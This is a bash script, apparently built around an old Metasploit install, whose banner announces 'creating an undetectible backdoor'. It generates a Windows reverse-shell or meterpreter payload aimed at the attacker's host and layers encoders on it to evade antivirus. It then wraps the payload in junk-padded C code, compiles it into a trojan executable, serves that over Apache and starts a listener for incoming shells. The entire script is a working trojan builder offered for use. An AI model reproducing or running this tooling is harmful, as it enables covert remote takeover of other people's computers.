clear
cd /pentest/exploits/framework3
echo "*************************************"
echo " 0         0     0    0   0    0   0 "
echo " 0         0     0     0 0      0 0  "
echo " 0         0000000      0        0   "
echo " 0         0     0      0       0 0  "
echo " 000000    0     0      0      0   0 "
echo "*************************************"
echo "  creating an undetectible backdoor  "
echo "*************************************"
echo -n 'lhost ("e" for external IP) ?'
read host
if [ "$host" == "e" ]; then
cd /tmp
wget http://www.watismijnip.be/ 
cd /tmp
cat index.html | grep "Your IP address is" >> ip.txt
cat ip.txt | cut -d\: -f2 >> ip2.txt
cat ip2.txt | cut -d\Y -f1 >> ip3.txt
sed -i "s/ *//g" ip3.txt
cat ip3.txt | sed s/.$// >> ip4.txt
rm ip.txt
rm ip2.txt
rm ip3.txt
ip=$(cat  $"ip4.txt")
rm ip4.txt
rm index.html
lhost=$ip
echo "*************************************"
echo "  External IP: "$lhost
echo "*************************************"
else lhost=$host
fi
cd /pentest/exploits/framework3
echo -n "lport?"
read lport 
echo -n "filename ?"
read filename
echo -n "meterpreter or reverse shell (m/rs) ?"
read kind
echo "Creating payload..."
if [ "$kind" == "rs" ]; then
echo -n "Start netcat listener afterwards (y/n) ?"
read reverse
./msfpayload windows/shell_reverse_tcp LHOST=$lhost LPORT=$lport R | ./msfencode -e x86/shikata_ga_nai -c 10 -t raw | ./msfencode -e x86/countdown -c 2 -o payload.c c
fi
if [ "$kind" == "m" ]; then
echo -n "Start multi/handler afterwards (y/n) ?"
read multi
./msfpayload windows/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport R | ./msfencode -e x86/shikata_ga_nai -c 10 -t raw | ./msfencode -e x86/countdown -c 2 -o payload.c c
fi
sed 's/+//' payload.c > payload2.c
rm payload.c
sed 1d payload2.c > payload3.c
rm payload2.c
echo "Preparing payload..."
payload=$(cat  $"payload3.c")
echo "Creating trojan..."
echo "#include <stdio.h>" >> trojan.c
echo "#include <stdlib.h>" >> trojan.c
echo "#include <string.h>" >> trojan.c
echo "#include <winsock2.h>" >> trojan.c
echo ""
echo ""
echo ""
echo "char payload[] = $payload;" >> trojan.c
echo ""
echo 'char comment[] = "THIS IS A COMMENT :Dcbcbcizsqviqvciqviqvcqivyuivbqdsivcbsqiufvquiqvdfihqzvuyfvzfyvzequyvzhfezuvfuyvyvfyvyvfyzvzuyvzuvzuyvzyzvfzyfvezevfiufvzyfvziyvzfzvfzvfvfqvfqfvzyqfvyzqvfzyfvyuzvfuezvfuyvfzuyfvzuivfzvyfyvuyrvfhesfbiujiubfiubfreyzfvfyrefuevfydzbdzdhziudhizuhdziuhdizuhezuiziuyzgfuyevzyfvzyfzivfuzyvfuzvfzuyvfuzyvfuzyvfuyefvzuyvzuvuvzuyfvuvzuhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiisbviubvuibdsivbsvsskdqojdsoijdiozjdiozndbqibfcsvsdddyhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhuhgfzsfbkjbhjksbcbscnsopsjionhjoiehozibfoiuzehzujbfjkbsjkb sjbskjbskjbsubfsbizubeizbiu";' >> trojan.c
echo ""
echo "int main(int argc, char **argv, int a, int b, int c,int d, int e, int f) {" >> trojan.c
echo '	char DERPDERP[544];' >> trojan.c
echo '	char CapitalofBelgium[]= "BRUSSELS";' >> trojan.c
echo '	char *herpaderp[98765];' >> trojan.c
echo '	(*(void (*)()) payload)();' >> trojan.c
echo '	return(0);' >> trojan.c
echo "}" >> trojan.c
echo "Compiling trojan..."
i586-mingw32msvc-gcc -mwindows trojan.c 
mv a.exe "/root/Desktop/$filename.exe"
echo "Cleaning up..."
rm payload3.c
rm trojan.c
echo "*************************************"
echo "Trojan created !"
echo "Location: /root/Desktop/"$filename".exe"
echo "*************************************"
echo -n "Upload to http server (y/n) ?"
read http
if [ "$http" == "y" ]; then
echo "Uploading ..."
cd /root/Desktop
cp $filename.exe /var/www/$filename.exe
echo "Starting HTTP server..."
sh -c "service apache2 start; sleep 4"
fi
if [ "$multi" == "y" ]; then
cd /pentest/exploits/framework3
./msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport E
fi
if [ "$reverse" == "y" ]; then
nc -lvp $lport
fi
echo "Done !"
exit